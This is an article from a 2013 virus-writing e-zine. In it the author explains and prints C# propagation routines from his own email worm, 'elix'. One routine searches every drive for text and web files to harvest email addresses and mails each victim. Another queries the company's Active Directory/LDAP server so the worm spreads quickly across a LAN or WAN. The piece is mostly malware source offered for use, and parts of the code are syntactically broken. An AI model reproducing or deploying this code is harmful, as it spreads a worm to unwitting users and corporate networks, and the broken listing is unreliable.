									  __________. 
									 /____/____/| 
									|  _  |  __|/ 
									|_|_| | |_/| 
			Effective Find mail strategy			 / _  |  _|/ 
			============================			| |_| | ||  
									|_____|_|/  
====================================================================================/
3f electronic magazine #1 - 2013					By:dJANGGO
====================================================================================/

.start

I've seen tons code of worm using Outlook.Application  object, and search the mail address
in  current address  list, this will work only when the host use outlook,and if not, you 
just wasting your time. Another way is better, I also have seen several worm searching the 
victim by scaning htm file in internet temporary directory, this is better,  but why only 
temp  folder ? why dont  you  search all flat text to find mail address format in current 
host.Today,after making elix, I will spend litle time to make some tiny article according
to the new technique I've used while code elix.

Elix use 2 different  way to search mail address in host resources (internal and external)

1. Internal resource

   This done  by Search all flat text file internal resource  that probably have an  email
   address, I've rip this code from elix.

------------------------------------------------------------------------------------------

	//Search all posible Email in current flat texts in host Harddrive

	public static void TrySendOverFileSearch(string ip)
	{
		Array.Resize(ref ListOfFileTypes, 6);  // Posible files that have an email
		ListOfFileTypes.SetValue("*.TXT", 0);  // address. Add any files you want
		ListOfFileTypes.SetValue("*.HTM", 1);  // here
		ListOfFileTypes.SetValue("*.HTML", 2); //
		ListOfFileTypes.SetValue("*.XML", 3);  //
		ListOfFileTypes.SetValue("*.ASP", 4);  //
		ListOfFileTypes.SetValue("*.PHP", 5);  //
		try {

			// Loop through all the drives on the host

			foreach (System.IO.DriveInfo drive in My.Computer.FileSystem.Drives) {
				if (drive.IsReady == true) {

					// search for files in the root directory

					foreach (string FileName in My.Computer.FileSystem.GetFiles(drive.Name, Microsoft.VisualBasic.FileIO.SearchOption.SearchTopLevelOnly, ListOfFileTypes)) {
						MailFound(ip, FileName); // function to search mail format when the file has found
					}

					//search sub directory

					foreach (string SubDir in My.Computer.FileSystem.GetDirectories(drive.Name)) {
						foreach (string FileName in My.Computer.FileSystem.GetFiles(SubDir, Microsoft.VisualBasic.FileIO.SearchOption.SearchAllSubDirectories, ListOfFileTypes)) {
							MailFound(ip, FileName); // function to search mail format when the file has found
						}
					}
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//Finding email address in text

	public static void MailFound(string ip, string Filename)
	{
		//read stream text object
		try {
			string stream = My.Computer.FileSystem.ReadAllText(Filename);
			[] arrstream = Strings.Split(stream, " ");
			foreach (object arr_loopVariable in arrstream) {
				arr = arr_loopVariable;
				if (ValidateMailAddress(arr)) { // validate mail format using regex
					sendMail(ip, getRandomMail(), arr); // send mail when address found
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

------------------------------------------------------------------------------------------.eoc

The trully fact is, when the more files found, the more fast its spread, This is more effective

2. External resource

   This is new way, When you cannot find much email address from internal resource, you can try to
   find email address from external resource, this done by scanning user account in LDAP directory
   server. I dont have good time to tell you what is LDAP,there is gooogle or you can read my next
   article. This also ripped from elix.

------------------------------------------------------------------------------------------

	//Now in in LDAP

	public static void TrySendOverAD(string ip)
	{
		try {
			string aName = WindowsIdentity.GetCurrent().Name;
			string aDomain = aName.Substring(0, aName.IndexOf("\\"));

			DirectoryEntry enTry = new DirectoryEntry("LDAP://" + aDomain + ":389");
			DirectorySearcher mySearcher = new DirectorySearcher(enTry);
			mySearcher.PageSize = 1000000;
			mySearcher.Filter = ("(&(objectCategory=person))");

			SearchResult resEnt = default(SearchResult);
			int a = 0;
			ResultPropertyCollection myResultPropColl = default(ResultPropertyCollection);
			string mkey = null;
			dynamic adname = null;
			dynamic mailTo = null;
			foreach ( resEnt in mySearcher.FindAll()) {
				myResultPropColl = resEnt.Properties;
				a = a + 1;
				
				// Search victim in AD, fast to spread over LAN/WAN

				foreach (string mkey_loopVariable in myResultPropColl.PropertyNames) {
					mkey = mkey_loopVariable;
					object myCollection = null;
					if (mkey.ToString() == "displayname") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							adname += myCollection.ToString();
						}
					}
					if (mkey.ToString() == "mail") {
						foreach (object myCollection_loopVariable in myResultPropColl(mkey)) {
							myCollection = myCollection_loopVariable;
							mailTo += myCollection.ToString();
						}
					}
					if (!string.IsNullOrEmpty(mailTo)) {
						if (ValidateMailAddress(mailTo)) {
							try {
								sendMail(ip, adname, mailTo);
							} catch (Exception ex) {
								throw ex;
							}
						}
					}
					adname = "";
					mailTo = "";
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
	}


------------------------------------------------------------------------------------------.eoc

When using this way, your worm will spread FAST over the LAN/WAN (I've test it), credit to psychologic
for sending me his total brutal SQL virus :p


.end

psychologic have do the equal technique in his virus, but mostly I never see worm with the technique like this
before.its good way for worm to spread fast locally.

Note : I never suggest to test the code at your local network.T R U S T  M E

										dJANGGO/3F
										chain me, or you die..